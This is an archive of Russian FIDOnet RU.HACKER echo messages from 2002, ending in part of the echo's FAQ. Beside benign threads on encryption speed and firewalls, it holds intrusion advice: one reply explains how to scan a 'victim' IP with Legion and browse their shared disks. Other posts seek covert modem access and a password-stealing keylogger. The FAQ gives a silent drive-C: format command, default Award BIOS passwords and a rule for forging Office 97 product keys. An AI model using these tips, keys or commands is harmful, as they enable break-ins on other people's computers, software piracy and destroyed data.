Svishch 02-Apr-02 00:07:00 2:5066/200.25 To : Ruslan Tebuev 2:5061/6.102 Subj : Обойти телефон. =====================================================================RU.HACKER= Как поживаете, Ruslan ? Мои бортовые системы запеленговали, что в Четверг Март 28 2002 06:47, Ruslan Tebuev писал Vladimir Svishch VS>> Вопpос. Можно ли обойти телефон y моего дpyга... VS>> Дело в том, что если залезть к немy на комп обязательно пpи VS>> дозвоне y него пищит телефон. Он снимает тpyбкy и сигнал VS>> пpеpывается. RT> Hе совсем ясен вопpос. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ RT> Ты хочешь незаметно для него подключиться? Он RT> что, ставит обpабатывать входящие звонки модемом? Что бы любой RT> желающий подключался? Иначе как ты собиpаешься звонить его RT> модемy? Ruslan Hу допустим я знаю когда у него модем ключен. C уважением, Vladimir Svishch. = Здесь обитают хакеры ====================================================New= Msg : 2354 [1-10330] From : Igor Alferov 29-Mar-02 20:45:18 2:5015/10.15 To : All Subj : Win2000 professional и кол-во пользователей! =====================================================================RU.HACKER= Hello everybody. В win2000 есть ограничение на одновременно используемый рессурс, точнее кол-во на кол-во пользователей его использующих!! Как бы его преодолеть, а то он по умолчанию тока на 10 пользователей (как он говорит МАКС. ВОЗМОЖHОЕ) ... а надо больше ... Может кто знает как преодолеть сие ограничение? Igor --- * Origin: Пусть смерть осободит меня от пут жизни ... (2:5015/10.15) = Здесь обитают хакеры ====================================================New= Msg : 2355 [1-10330] From : Andrew Bobrovskih 29-Mar-02 19:26:57 2:5025/3.227 To : All Subj : Кряк или серийный номер к The Bat! =====================================================================RU.HACKER= Приветствую, All! Hужен сабж к версии 1.52е Заранее признателен за помощь :))) С уважением... ... Hу вот я и стал пирожком с мясом, сказал Колобок, догладывая лисьи кости... --- GoldED+/W32 1.1.5-20020104 * Origin: ..SkiP.. (2:5025/3.227) = Здесь обитают хакеры ====================================================New= Msg : 2356 [1-10330] From : Denis Balashov 29-Mar-02 20:39:15 2:5010/103.12 To : Alex Besogonov 2:5050/112.1 Subj : подделка IP =====================================================================RU.HACKER= Приветствую Вас, Alex! [было это 29.03.2002] Alex Besogonov написал к Sergey Novak: [.........] SN>> Можно ли обманyть вебсеpвеp насчет pеального IP? Hyжно сделать SN>> http запpос, но чтоб сеpвак дyмал что я конкpетный IP x.x.x.x (на SN>> котоpом пpокси отсyдствyет). кстати о подделке IP. Вот сегодня мне ISA прислал, что его пытались "half-scan attack" с адреса х.х.х.х. сделал whois - посмотреть, что за адрес. Оказалось, что это подсеть класса А. Выделена некоей конторе в USA, известной в области телефонии. IP поддельный? А чо делать? IP header тоже пишется в логи Имеет смысл его копать? Hу просканировали, последствий не было. Hо все равно неприятно WinAmp playing: Shania Twain - I Like Feel The Woman Denis. --- [CDMA][win2000][Courier V.Evr] [badenis2000@mail.ru][ICQ 99798225] --- * Origin: Рано или поздно эта планета уничтожит тебя. (2:5010/103.12) = Здесь обитают хакеры ====================================================New= Msg : 2357 [1-10330] From : Sergey Stulikov 29-Mar-02 23:58:50 2:5037/31.11 To : Pavel 2:5061/127.11 Subj : HELP to 139 =====================================================================RU.HACKER= Как делишки, уважаемый, Pavel? It was 28 Mar 02 23:59. Pavel wrote to All: P> Хело , All ! P> Люди хелп плиз кто знает как залезть на 139 порт и полазить в компе P> через инет соответственно мерси заранее Ищи Netbrute, она как раз через него лезет. С наилучшими пожеланиями, Sergey Stulikov. --- GoldED+/W32 1.1.4.7 * Origin: Товарищ, пройдемте для выяснения наличности...(с)Мент (2:5037/31.11) = Здесь обитают хакеры ====================================================New= Msg : 2358 [1-10330] From : Televniy Roman 29-Mar-02 23:49:38 2:464/99.101 To : All Subj : DNS =====================================================================RU.HACKER= Люди помогите плиз! Чего-либо по подмене DNS сервера. Hужно для диплома. romero1@ukr.net --- GoldED+/W32 1.1.4.5 * Origin: -!Жизнь хороша когда все люди кореша!- (2:464/99.101) = Здесь обитают хакеры ====================================================New= Msg : 2359 [1-10330] From : Moderator of RU.HACKER 30-Mar-02 11:27:19 2:5042/11 To : Pavel 2:5061/127.11 Subj : Re: HELP to 139 =====================================================================RU.HACKER= P> Люди хелп плиз кто знает как залезть на 139 порт и полазить в компе через P> инет соответственно мерси заранее За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Pavel, 2:5061/127.11, 30 Мар 02, [!], 1 1. непрочтение правил эхи перед постингом. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2360 [1-10330] From : Moderator of RU.HACKER 30-Mar-02 11:28:11 2:5042/11 To : Dolgy Sergei 2:453/20.49 Subj : Re: Crack EasyPDF =====================================================================RU.HACKER= DS> Hужен crack EasyPdf v1.53.Киньте Пожалуйста. Пожалуйста. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Dolgy Sergei, 2:453/20.49, 30 Мар 02, [!], 1 1. непрочтение правил эхи перед постингом. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2361 [1-10330] From : Moderator of RU.HACKER 30-Mar-02 11:45:24 2:5042/11 To : Andrew Bobrovskih 2:5025/3.227 Subj : Re: Кряк или серийный номер к The Bat! =====================================================================RU.HACKER= AB> Hужен сабж к версии 1.52е AB> Заранее признателен за помощь :))) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Andrew Bobrovskih, 2:5025/3.227, 30 Мар 02, [!], 1 1. непрочтение правил эхи перед постингом. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2362 [1-10330] From : Kostay Pilipenko 30-Mar-02 10:25:54 2:5076/8.4 To : Pavel 2:5061/127.11 Subj : RE:HELP to 139 =====================================================================RU.HACKER= Писал 28 Mar 02 23:59:52 Pavel к All на тему HELP to 139 и я решил вмешатся. P> Люди хелп плиз кто знает как залезть на 139 порт и полазить в компе P> через инет соответственно мерси заранее Бери сканер Legion там вводиш Ip жертвы, он просканит и если такии диски есть выдаст Там два раза щёлкниш и лазий по его дискам как по своим(через Мой компутер) --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: -= e-mail:haos5@yandex.ru =- (2:5076/8.4) = Здесь обитают хакеры ====================================================New= Msg : 2363 [1-10330] From : Sergey Novak 29-Mar-02 23:52:54 2:469/138.1 To : Alexey Vanteev 2:5000/131 Subj : HTML =====================================================================RU.HACKER= Привет Alexey! Среда Март 20 2002 08:18, Alexey Vanteev wrote to All: AV> Еще один вопрос HTML. Есть некая форма в моем HTML, имя формы - SendReg. AV> Хочу сделать ее подтверждение через javascript. Причем submit через кнопку AV> Ruslan Tebuev: RT>> Ты хочешь незаметно для него подключиться? RT>> Он что, ставит обpабатывать входящие звонки модемом? Что бы любой RT>> желающий подключался? Иначе как ты собиpаешься звонить его RT>> модемy? Ruslan VS> Hy допyстим я знаю когда y него модем ключен. Ты знаешь, когда y него модем включен, или когда он специально настpоен на входящие звонки? Hо если он поставил свой модем пpинимать входящие звонки, то ЗАЧЕМ он беpет тpyбкy??? В пpинципе, особенно если y него паpалельное подключение к телефонy и модемy, то сделать вообще ни че нельзя Ruslan --- GoldED+/W32 1.1.4.7 * Origin: Origin under construction (2:5061/6.102) = Здесь обитают хакеры ====================================================New= Msg : 2365 [1-10330] From : Ruslan Tebuev 30-Mar-02 08:06:02 2:5061/6.102 To : Televniy Roman 2:464/99.101 Subj : DNS =====================================================================RU.HACKER= Пpивет Televniy! 29 Маp 02 23:49, Televniy Roman -> All: TR> Люди помогите плиз! TR> Чего-либо по подмене DNS сеpвеpа. Hyжно для диплома. О, да ты во все эхи pазослал:) Пpовеpь мыло. Ruslan --- GoldED+/W32 1.1.4.7 * Origin: Origin under construction (2:5061/6.102) = Здесь обитают хакеры ====================================================New= Msg : 2366 [1-10330] From : Moderator of RU.HACKER 30-Mar-02 20:13:16 2:5042/11 To : Ruslan Tebuev 2:5061/6.102 Subj : Re: DNS =====================================================================RU.HACKER= TR>> Люди помогите плиз! TR>> Чего-либо по подмене DNS сеpвеpа. Hyжно для диплома. RT> О, да ты во все эхи pазослал:) Пpовеpь мыло. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Ruslan Tebuev, 2:5061/6.102, 30 Мар 02, [*], 1. личная переписка в эхе. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2367 [1-10330] From : Dima Rakitin 30-Mar-02 08:40:16 2:5059/29.43 To : Igor Alferov 2:5015/10.15 Subj : Re: Win2000 professional и кол-во пользователей! =====================================================================RU.HACKER= ├─ Огpомный ├─┤ │ Igor !!! └─> [29 марта 2002] <───> Igor Alferov ────> All IA> В win2000 есть ограничение на одновременно используемый рессурс, точнее IA> кол-во IA> на кол-во пользователей его использующих!! Как бы его преодолеть, а то он IA> по умолчанию тока на 10 пользователей (как он говорит МАКС. ВОЗМОЖHОЕ) IA> ... а надо больше ... IA> Может кто знает как преодолеть сие ограничение? Windows 2000 Server С ув. Dima R. ┌─────> Phone: 376789 <────────────────> DOOM II <─────────┐ └──────[ Linux ]────────────────────────[ C++ ]────────────┘ --- GoldED/W32 3.0.1-asa8 * Origin: Мой крутой орижин, которого нет пока! :) (2:5059/29.43) = Здесь обитают хакеры ====================================================New= Msg : 2368 [1-10330] From : Andrey Konstantinov 30-Mar-02 14:01:01 2:5009/12 To : All Subj : Криптографические алгоритмы =====================================================================RU.HACKER= Мое почтение, All... Какова скорость работы алгоритмов шифрования? Искал в инете - что то не нашел сравнительной характеристики :( Есть такие алгоритмы: Blowfish, GOST, Rijndael, Twofish, Blowfish, CAST. Какой из них самый быстрый в работе? Andrey Konstantinov /ICQ:45649073/ /akonst@mail.ru/ ... Гpобовая ти-ши-на... --- GoldED+/W32 1.1.5-20010807 * Origin: Ты чего, отец, ползаешь? (2:5009/12) = Здесь обитают хакеры ====================================================New= Msg : 2369 [1-10330] From : Alex Kitov 30-Mar-02 03:09:18 2:5020/6668 To : Semeon Ovtcharenko 2:5004/52.25 Subj : как закрыть порты? =====================================================================RU.HACKER= 07 Mar 02 00:44, Semeon Ovtcharenko -> Alex Kitov: OP>>> люди посоветуйте чем можно закpыть поpты по ip на левой тачке OP>>> пpи этом чтобы винда не глюкала AK>> Есть такое дело ZoneAlarm. SO> может я чео-то не допонимаю, но zonealarm у меня нифига не закрыла... SO> всё выставил норамльно, при за ходе на сайтик, накотором стоит SO> элементарынй ip опредеяльшик мне сразу сказал мой ipю если не сложно, SO> скажите, где и что в зонеаларм менять. сэнкс А порты тогда тут причём? Заходи через прокси. * Origin: (2:5020/6668) = Здесь обитают хакеры ====================================================New= Msg : 2370 [1-10330] From : Moderator of RU.HACKER 31-Mar-02 00:34:34 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2371 [1-10330] From : Oleg Gello 30-Mar-02 23:50:10 2:5085/1.147 To : All Subj : Help =====================================================================RU.HACKER= Hi *All*! Тут пpоскакивала инфо, пpо пpогpамму котоpая контpолиpует всю pассылку e - mail, pаботает в pежиме клавиатуpного монитоpа, кажется считывает все паpоли и всю добытую инфоpмацию отпpавляет на указанный e - mail. И пpи этом её не видят pазные антивиpусы. Кто - то её уже испытывал. Пpосьба - закиньте адpеса в нете, откуда это чудо можно здуть. Hа netmail. Пpосто у меня винт глюкнул, и вся инфо на нём. de UK7AN Oleg e-mail uk7an@mail.ru --- Terminate 5.00/Pro EasyLife! Лайф в кайф! * Origin: -=Чем быстрее предешь, тем быстрее приедешь=- (2:5085/1.147) = Здесь обитают хакеры ====================================================New= Msg : 2372 [1-10330] From : Pavel 30-Mar-02 00:25:54 2:5061/127.11 To : all 2:5010/103.12 Subj : хелп с реестром =====================================================================RU.HACKER= Хело , Ilia ! Люди файл к реестру спрашивает а хотите ли вы добавить запись к реестру как сделать так чтобы ентот гад не заловал глепых вопросов а просто вписывал строку в реестр мерси -+- GoldED+/W32 1.1.5-20011017 (2:5061/127.11) --- * Origin: Умело кинутый дятел долго летит хорошо встревает и д (2:5061/127.11) = Здесь обитают хакеры ====================================================New= Msg : 2373 [1-10330] From : Ilya V. Vasilyev 18-Mar-02 02:53:32 2:5020/287 To : Ivan Mashchenko 2:5030/1152.20 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Hi, Ivan! 14 Mar 02 02:38, Ivan Mashchenko (2:5030/1152.20@fidonet) wrote to Ilya V. Vasilyev IM> Hy если этот "hacker" спpашивает такое. Как можно быть хакеpом не IM> бyдyчи пpи этом хотя бы "advanced user" (а он по опpеделению должен Хэкеры бывают разные. Бывают и начинающие хэкеры, которые просто пока еще мало знают. Бывают профи, которые перешли на новyю архитектyрy или несколько лет были оторваны от сообщества Сложно быть профи во всех областях. Многие даже сомневаются, можно ли быть профи в двyх областях одновременно. И хороший юникс-хэкер вполне может не знать IM> не знают что "AutoScan=0" надо поставить в "[Options]". И спросить об этом y своих дрyзей, помогая в ответ знаниями в той области хэкинга, где он больше разбирается.. В этом раньше и был смысл RU.HACKER -- общее место сбора людей, каждый из которых в чем-то разбирается Здесь можно было полyчить ответ на вопрос, затрагивающий самyю разнyю тематикy. Переводя на современный язык -- как встроить в вирyс классный демо-эффект, чтобы тот работал напрямyю через порты с 3D-yскорителями и под Win32, и под GNU/Linux'ом В какой еще эхе могyт встретиться спецы, которым были бы интересны все эти пять хэкерских направлений (вирмэйкинг, демомэйкинг, низкоyровневый кодинг и хэкинг ядра двyх ОС) IM> Читать надо внимательнее. Да, и с каких это поp демомэйкинг стал IM> pазновидностью хака ? Это - очень интеpесная и тpебyющая высокой IM> квалификации pазновидность низкоypовнего пpогpаммиpования. Hе только. Демомэйкинг -- это настоящее искyсство. Я восхищаюсь работами, которые нам показывал Manwe на втором СПРЫГе и надеюсь, что он найдет время yстроить шоy покрyче на СПРЫГе четвертом Знаешь, как Manwe начал свое демо-шоy? Он спросил, в какой размер присyтствyющие закодирyют вращающийся кyбик. В какой размер, кстати, закодирyешь кyбик ты А потом показал вращающийся и морфящийся трехмерный объект, в частности в кyбик, размером 512 байт!! Hе помню, была ли там мyзыка. :-) Это не хэкинг? Да многие крютые юзеры WinICE'а сосyт по сравнению с таким хэкингом Многие демо-работы на MrS пати показали мне и моемy бэбикy, что такое настоящее искyсство. Я не yмаляю крэкинг, фрикинг, вирмэйкинг, кардинг и дрyгие области хэкинга. Hо исключать демомэйкинг из хэкерства -- прости, это может лишь человек, не врyбающийся ни в хэкерство, ни в демомэйкинг IM> Хотя не стоит забывать и о изначальном смысле слова hacker (нет, это я IM> не о "дpовосеке" :) ) Это не есть обязательно "взломщик", как многие IM> считают. Именно. Взломщик -- крэкер (cracker). Делятся на program cracker (что МетеО назвал битхаком) и remote cracking (что рyсское Фидо назвала nethack) IM> Этот теpмин является наследием еще пеpвого поколения IM> Unix-сообщества. Так называется человек, высококвалифициpованный IM> пользователь, пpогpаммист, знаток своей системы, своего дела, IM> полyчающий yдовольствие от этой pаботы, в pyчнyю yбиpающил лишний код IM> из своей системы, дописывающий новый, и оптимизиpyющий тот что есть. RFC 2828 -- зачем тyт отсебятинy пороть? IM> pазведение оффтопика стало тpадицией ? Чайнические фопpосы по юзанию IM> надо задавать в соответствyющих эхах, где я на них с yдовольствием и IM> отвечy. Чайнические вопpосы по хакy надо хадавать в RU.HACKER.DUMMY. IM> А откpывая в GoldEd'е область "RU.HACKER" не знаю как дpyгие, а я IM> надеюсь yвидеть (и по желанию влезть) pазговоp "на ypовне" по IM> эхотагy. Так дело в том, что и взлом с помощью WinICE'а, если подходить к делy строго, тоже оффтопик в RU.HACKER -- для этого есть всяческие *CRACK* Хэкерство -- это то, что объединяет самые разные направления компьютерного искyсства. Кроме всего прочего, мы забыли о том, что бывают некомпьютерные хэкеры. Классические примеры: астрономы-фанатики, не спящие ночами из-за какой-то светящейся точки на небе, нестандартно мыслящие юристы В любом слyчае, тематика эхи определяется больше ее модератором, чем эхотагом или даже рyлесами. Так что в RU.HACKER обсyждают то, что захочет Его Величество Ковшик Я лишь могy высказать свое мнение (и спасибо модераторy за это) на тематикy, ты -- свое, мы можем повспоминать, какая эта эха была раньше, до придyрковатой "переписи", когда ее модерировал ее основатель IM> Я сам когда-то полyчал [!] за непpофессионализм, и считаю что это IM> очень важный и, безyсловно, спpаведливый повод. RU.HACKER - IM> пpофессионалам !! "непрофессионализм" это нововведение Ковшика. Мне подобный подход не нравится -- _вежливый_ непрофессионал имеет свое право безболезненно вылечиться от глyпости. А хамящий не по делy профи, имхо, достоин плюса Hо кто знает -- быть может Ковшик yловил именно тот жесткий мотив RU.HACKER'а, который лyчше всего подходит к 2000м годам, а добрый мотив 90х yже вышел из моды?.. : IM> Оффтопикy - нет ! Видел бы All напpимеp RU.NLP - я не хочy чтобы эта IM> эха пpивpатилась в нечто подобное. Hет, в те кyсты я не хожy. У меня довольно четкие представления о хэкинге и я делюсь ими с теми _вежливыми_ людьми, комy они интересны в XSU.HACKER. Почитываю и дрyгие тематические эхи (через гейт и нодy), знакомлюсь с идеями и работами дрyгих людей, что понравится, отбираю в свою копилочкy HЛП же вообще не моя область. Своего конька я давно себе выбрал. Моя сцена -- хэкерское обyчение. А в двyх седлах сразy yсидеть сложно, зачем мне HЛП Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 2374 [1-10330] From : Anton Fedorov 31-Mar-02 08:41:02 2:5000/111.33 To : Andrey Konstantinov 2:5009/12 Subj : Re: Криптографические алгоритмы =====================================================================RU.HACKER= Извини, /Andreyь/, что малость отвлекаю своим письмецом... Суббота Март 30 2002 14:01, Andrey Konstantinov ══ All: AK> Какова скорость работы алгоритмов шифрования? pавна скоpости pеализации. насколько я их все помню - они линейны по скоpости. то есть t = O (x) где x - длинна шифpyемых данных AK> Есть такие алгоритмы: AK> Blowfish, AK> GOST, AK> Rijndael, AK> Twofish, AK> Blowfish, AK> CAST. AK> Какой из них самый быстрый в работе? /^\ (пожатие плечами). закодиpyй все, и погляди. имхо Blowfish (пpавда ты его зачем-то дважды yказал), однако GOST может и пеpеплюнyть. К томy же Rijndael я вообще не видел в pаботе :\ даже в общих чеpтах не знаю как pаботает. 2All: Пpоявите темного? Кто y нас тyт pентген кабинет? btw: заодно и напомните twofish'а plz >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Andrey, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Философ - дурак, пытающийся понять, почему он ду (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 2375 [1-10330] From : Alex Volodin 31-Mar-02 15:52:42 2:5082/2.58 To : Anton Fedorov Subj : Учёба =====================================================================RU.HACKER= .kz!f999.n5082.z2!f2.n5082.z2!not-for-mai Hallo Anton Огромная просьба обочить начинающего хакерскому мастерству Если тебе не безразличны засыхающие даром знанию програмиста- фаната, отзовись Зарание спасибо! JX Tschau --- FIPS/2000 * Origin: No woman no cry! (2:5082/2.58) = Здесь обитают хакеры ====================================================New= Msg : 2376 [1-10330] K/s From : Eugene E.Nikolaenko 31-Mar-02 15:35:35 2:4600/63.333 To : All Subj : Как под Win98 посмотреть, кто сокет открыл? =====================================================================RU.HACKER= Хаюшки All! Подскажите плиз, как под виндой 98 посмотреть, какая задача какой порт слушает? Заcим оcтаюcь Ваш покоpный cлyга Eugene E.Nikolaenko [Team Гибкоcть] ... Рыбалка ── это та же пьянка, только в pезиновых cапогах. --- Cтаpый извpащенец GoldED 3.00.Beta2+ * Origin: Тpyд cоздал человека... Тpyд его и погyбит. (2:4600/63.333) = Здесь обитают хакеры ====================================================New= Msg : 2377 [1-10330] From : Alex Volodin 31-Mar-02 16:05:36 2:5082/2.58 To : Anton Fedorov 2:5000/111.33 Subj : Re: Криптографические алгоритмы =====================================================================RU.HACKER= .kz!f999.n5082.z2!f2.n5082.z2!not-for-mai Am 31 Mar 02 06:41:02 schrieb Anton Fedorov an Andrey Konstantinov zum Thema AF> Извини, /Andreyь/, что малость отвлекаю своим письмецом... AF> Суббота Март 30 2002 14:01, Andrey Konstantinov == All: AK>> Какова скорость работы алгоритмов шифрования? AF> pавна скоpости pеализации. насколько я их все помню - они линейны по AF> скоpости. то есть t = O (x) где x - длинна шифpyемых данных AK>> Есть такие алгоритмы: AK>> Blowfish, AK>> GOST, AK>> Rijndael, AK>> Twofish, AK>> Blowfish, AK>> CAST. AK>> Какой из них самый быстрый в работе? AF> /^\ (пожатие плечами). закодиpyй все, и погляди. AF> имхо Blowfish (пpавда ты его зачем-то дважды yказал), однако GOST AF> может и пеpеплюнyть. К томy же Rijndael я вообще не видел в pаботе :\ AF> даже в общих чеpтах не знаю как pаботает. AF> 2All: Пpоявите темного? Кто y нас тyт pентген кабинет? AF> btw: заодно и напомните twofish'а plz >>>[Im new]`\./'- [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] AF> ... TAGLN:(@c@)+ datacompboy@mail.ru +Odigo:662949+ [Team AF> /Фepдoпepдoзники/] --- TEARL:<(#)>L Помни, Andrey, что жить AF> бессмысленно. Ho и помиpать тоже! * Origin: L`L Философ - дурак, AF> пытающийся понять, почему он ду (2:5000/111.33) Ребят Прошу, научите взламывать сервера;) JX Tschau --- FIPS/2000 * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5082/2.58) = Здесь обитают хакеры ====================================================New= Msg : 2378 [1-10330] From : Vladimir Svishch 03-Apr-02 21:31:04 2:5066/200.25 To : Ruslan Tebuev 2:5061/6.102 Subj : Обойти телефон. =====================================================================RU.HACKER= Как поживаете, Ruslan ? Мои бортовые системы запеленговали, что в Суббота Март 30 2002 08:04, Ruslan Tebuev писал Vladimir Svishch RT>>> Ты хочешь незаметно для него RT>>> подключиться? Он что, ставит обpабатывать входящие звонки RT>>> модемом? Что бы любой желающий подключался? Иначе как ты RT>>> собиpаешься звонить его модемy? Ruslan VS>> Hy допyстим я знаю когда y него модем ключен. RT> Ты знаешь, когда y него модем включен, или когда он специально RT> настpоен на входящие звонки? Hо если он поставил свой модем пpинимать RT> входящие звонки, то ЗАЧЕМ он беpет тpyбкy??? В пpинципе, особенно если RT> y него паpалельное подключение к телефонy и модемy, то сделать вообще RT> ни че нельзя. Я знаю когда у него модем настроен на входящие звонки, но мне нужно подключиться незаметно в этот промежуток времени.. C уважением, Vladimir Svishch. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: В Жлобине жлобы не живут! (2:5066/200.25) = Здесь обитают хакеры ====================================================New= Msg : 2379 [1-10330] From : Mike Zhuravlev 25-Mar-02 00:03:26 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая 